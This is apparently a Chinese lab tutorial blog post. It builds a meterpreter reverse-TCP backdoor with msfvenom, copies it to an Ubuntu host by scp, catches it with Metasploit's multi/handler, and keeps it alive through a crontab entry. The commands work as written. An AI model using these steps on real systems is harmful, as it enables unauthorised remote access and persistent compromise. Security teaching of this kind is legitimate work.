网络安全: Kali Linux 进行 MSFvenom 程序利用

2024-03-07 11:20

本文主要是介绍网络安全: Kali Linux 进行 MSFvenom 程序利用,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

 一、实验

1.环境

2. Kali Linux 进行 MSFvenom 程序利用

3. 创建计划任务自动运行 MSFvenom 程序

二、问题

1.在线加密解密

2.MSF 运行失败

3.MobaXterm 连接Ubuntu 失败


 一、实验

1.环境

(1)主机

表1  主机

系统版本IP备注
Kali Linux2022.4

192.168.204.154(动态)

Ubuntu8.04192.168.204.143Kali(2022.4)的目标主机

(2)查看Kali Linux (2022.4)系统版本

cat /etc/os-release

(6) 查看Kali Linux (2022.4)系统IP地址

ip addr | grep 154

(7)查看Ubuntu 8.04 系统版本及IP地址

lsb_release -a

ip addr

2. Kali Linux 进行 MSFvenom 程序利用

(1)创建后⻔程序

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.204.154 lport=4444 -f elf -o shell

(2) 配置ssh文件

vim .ssh/config

Host *
HostkeyAlgorithms +ssh-rsa
PubkeyAcceptedKeyTypes +ssh-rsa

(3)植⼊后⻔程序

scp shell root@192.168.204.143:/mnt

(4)Ubuntu查看权限

ls -l /mnt

(4)Ubuntu激活后⻔程序

chmod  a+x  /mnt/shell

(5)再次查看权限

ls -l /mnt

(6)Ubuntu后台执行

/mnt/shell & 

(7)Kali Linux 连接后门

新开一个终端

msfconsole

(8)调用侦听模块

 use  exploit/multi/handler 

(9)设置响应的IP地址

 set lhost 192.168.204.154

(10)设置响应的端口

set lport  4444

(11)设置载荷

set payload linux/x86/meterpreter/reverse_tcp

(12)运行

开启TCP反向侦听

run

(13)Ubuntu再次后台运行

(14)已连接

(15)查看用户权限及进程

用户

getuid

进程号

getpid

(16) 进入内核

shell

查看用户

whoami

查看路径

pwd

(17)退出

exit

3. 创建计划任务自动运行 MSFvenom 程序

(1)Ubuntu创建计划任务crontab程序

EDITOR=vim crontab -e

修改前:

修改后:

# m h  dom mon dow   command
* * * * * /bin/date>>/tmp/time.txt
* * * * * /mnt/shell &

(2)Kali Linux 连接后门

新开一个终端

msfconsole

 (3)调用侦听模块

 use  exploit/multi/handler 

(4)设置响应的IP地址

 set lhost 192.168.204.154

(5)设置响应的端口

set lport  4444

(6)设置载荷

set payload linux/x86/meterpreter/reverse_tcp

(7)运行

开启TCP反向侦听(已自动连接)

run

(8)运行在后台

background

(9) 查看会话

sessions

(10)切换会话

sessions 1

(11) 退出

exit

二、问题

1.在线加密解密

(1)查看DES 对称加密

http://www.jsons.cn/desencrypt

2.MSF 运行失败

(1) 报错

(2)原因分析

lhost地址错。

(3)解决方法

修改lhost地址。

已连接:

3.MobaXterm 连接Ubuntu 失败

(1) 报错

(2)原因分析

Ubuntu未设置root密码

(3)解决方法

sudo -ipasswd root

成功:

这篇关于网络安全: Kali Linux 进行 MSFvenom 程序利用的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/783332

相关文章

如何用java对接微信小程序下单后的发货接口

《如何用java对接微信小程序下单后的发货接口》:本文主要介绍在微信小程序后台实现发货通知的步骤,包括获取Access_token、使用RestTemplate调用发货接口、处理AccessTok... 目录配置参数 调用代码获取Access_token调用发货的接口类注意点总结配置参数 首先需要获取Ac

Linux下修改hostname的三种实现方式

《Linux下修改hostname的三种实现方式》:本文主要介绍Linux下修改hostname的三种实现方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录linux下修改ho编程stname三种方式方法1:修改配置文件方法2:hFvEWEostnamectl命

Nginx如何进行流量按比例转发

《Nginx如何进行流量按比例转发》Nginx可以借助split_clients指令或通过weight参数以及Lua脚本实现流量按比例转发,下面小编就为大家介绍一下两种方式具体的操作步骤吧... 目录方式一:借助split_clients指令1. 配置split_clients2. 配置后端服务器组3. 配

Linux虚拟机不显示IP地址的解决方法(亲测有效)

《Linux虚拟机不显示IP地址的解决方法(亲测有效)》本文主要介绍了通过VMware新装的Linux系统没有IP地址的解决方法,主要步骤包括:关闭虚拟机、打开VM虚拟网络编辑器、还原VMnet8或修... 目录前言步骤0.问题情况1.关闭虚拟机2.China编程打开VM虚拟网络编辑器3.1 方法一:点击还原VM

Linux搭建Mysql主从同步的教程

《Linux搭建Mysql主从同步的教程》:本文主要介绍Linux搭建Mysql主从同步的教程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录linux搭建mysql主从同步1.启动mysql服务2.修改Mysql主库配置文件/etc/my.cnf3.重启主库my

Python使用DeepSeek进行联网搜索功能详解

《Python使用DeepSeek进行联网搜索功能详解》Python作为一种非常流行的编程语言,结合DeepSeek这一高性能的深度学习工具包,可以方便地处理各种深度学习任务,本文将介绍一下如何使用P... 目录一、环境准备与依赖安装二、DeepSeek简介三、联网搜索与数据集准备四、实践示例:图像分类1.

Linux系统之authconfig命令的使用解读

《Linux系统之authconfig命令的使用解读》authconfig是一个用于配置Linux系统身份验证和账户管理设置的命令行工具,主要用于RedHat系列的Linux发行版,它提供了一系列选项... 目录linux authconfig命令的使用基本语法常用选项示例总结Linux authconfi

基于Python开发PDF转Doc格式小程序

《基于Python开发PDF转Doc格式小程序》这篇文章主要为大家详细介绍了如何基于Python开发PDF转Doc格式小程序,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下... 用python实现PDF转Doc格式小程序以下是一个使用Python实现PDF转DOC格式的GUI程序,采用T

jdk21下载、安装详细教程(Windows、Linux、macOS)

《jdk21下载、安装详细教程(Windows、Linux、macOS)》本文介绍了OpenJDK21的下载地址和安装步骤,包括Windows、Linux和macOS平台,下载后解压并设置环境变量,最... 目录1、官网2、下载openjdk3、安装4、验证1、官网官网地址:OpenJDK下载地址:Ar

web网络安全之跨站脚本攻击(XSS)详解

《web网络安全之跨站脚本攻击(XSS)详解》:本文主要介绍web网络安全之跨站脚本攻击(XSS)的相关资料,跨站脚本攻击XSS是一种常见的Web安全漏洞,攻击者通过注入恶意脚本诱使用户执行,可能... 目录前言XSS 的类型1. 存储型 XSS(Stored XSS)示例:危害:2. 反射型 XSS(Re